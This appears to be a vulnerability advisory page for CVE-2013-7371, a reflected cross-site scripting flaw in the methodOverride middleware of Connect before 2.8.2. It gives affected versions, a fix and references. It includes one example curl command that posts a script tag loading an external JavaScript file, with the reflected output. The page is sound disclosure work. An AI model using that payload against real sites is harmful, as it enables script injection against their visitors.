CVE-2013-7371: XSS
First published: Wed Dec 11 2019(Updated: )
node-connect before 2.8.2 has cross site scripting in Sencha Labs Connect middleware (vulnerability due to incomplete fix for CVE-2013-7370) ### Overview Connect is a stack of middleware that is executed in order in each request. The "methodOverride" middleware allows the http post to override the method of the request with the value of the "_method" post key or with the header "x-http-method-override". Because the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the "Cannot `[method]` `[url]`" content. The method was not properly encoded for output in the browser. ### Example: ``` ~ curl "localhost:3000" -d "_method=<script src=http://nodesecurity.io/xss.js></script>" Cannot <SCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS></SCRIPT> / ``` ### Recommendation Update to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack. ### Credit: Sergio Arcos
Credit: secalert@redhat.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| npm/connect | <2.8.2 | 2.8.2 |
| debian/node-connect | 3.6.7-1 3.7.0-2 3.7.0+~3.4.35-1 | |
| Sencha Connect | <2.8.2 | |
| Debian GNU/Linux | =8.0 | |
| Debian GNU/Linux | =9.0 | |
| Debian GNU/Linux | =10.0 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://nvd.nist.gov/vuln/detail/CVE-2013-7371
- https://access.redhat.com/security/cve/cve-2013-7371
- https://exchange.xforce.ibmcloud.com/vulnerabilities/92710
- https://nodesecurity.io/advisories/methodOverride_Middleware_Reflected_Cross-Site_Scripting
- https://security-tracker.debian.org/tracker/CVE-2013-7371
- http://www.openwall.com/lists/oss-security/2014/04/21/2
- http://www.openwall.com/lists/oss-security/2014/05/13/1
- https://github.com/senchalabs/connect/issues/831
- https://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a
- https://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135
- https://github.com/advisories/GHSA-6w62-83g6-rfhj (Advisory)
Frequently Asked Questions
What is CVE-2013-7371?
CVE-2013-7371 is a vulnerability in node-connect before version 2.8.2 that allows for cross-site scripting attacks.
What is the severity of CVE-2013-7371?
The severity of CVE-2013-7371 is medium with a CVSS severity value of 6.1.
How does CVE-2013-7371 affect Sencha Labs Connect middleware?
CVE-2013-7371 affects Sencha Labs Connect middleware by allowing cross-site scripting attacks due to an incomplete fix for CVE-2013-7370.
How can I fix CVE-2013-7371 for my npm Connect package?
To fix CVE-2013-7371 for your npm Connect package, update to version 2.8.2 or later.
How can I fix CVE-2013-7371 for Debian Linux?
To fix CVE-2013-7371 for Debian Linux, update your node-connect package to version 3.6.7-1, 3.7.0-2, or 3.7.0+~3.4.35-1.
- collector/github-advisory-latest
- alias/GHSA-6w62-83g6-rfhj
- alias/CVE-2013-7371
- collector/github-advisory
- collector/security-tracker-debian
- agent/type
- agent/first-publish-date
- agent/last-modified-date
- agent/weakness
- agent/references
- agent/remedy
- agent/severity
- agent/description
- agent/event
- agent/author
- collector/nvd-cve
- agent/software-canonical-lookup-request
- agent/softwarecombine
- agent/tags
- collector/nvd-index
- package-manager/npm
- package-manager/debian
- vendor/sencha
- canonical/sencha connect
- vendor/debian
- canonical/debian gnu/linux
- version/debian gnu/linux/8.0
- version/debian gnu/linux/9.0
- version/debian gnu/linux/10.0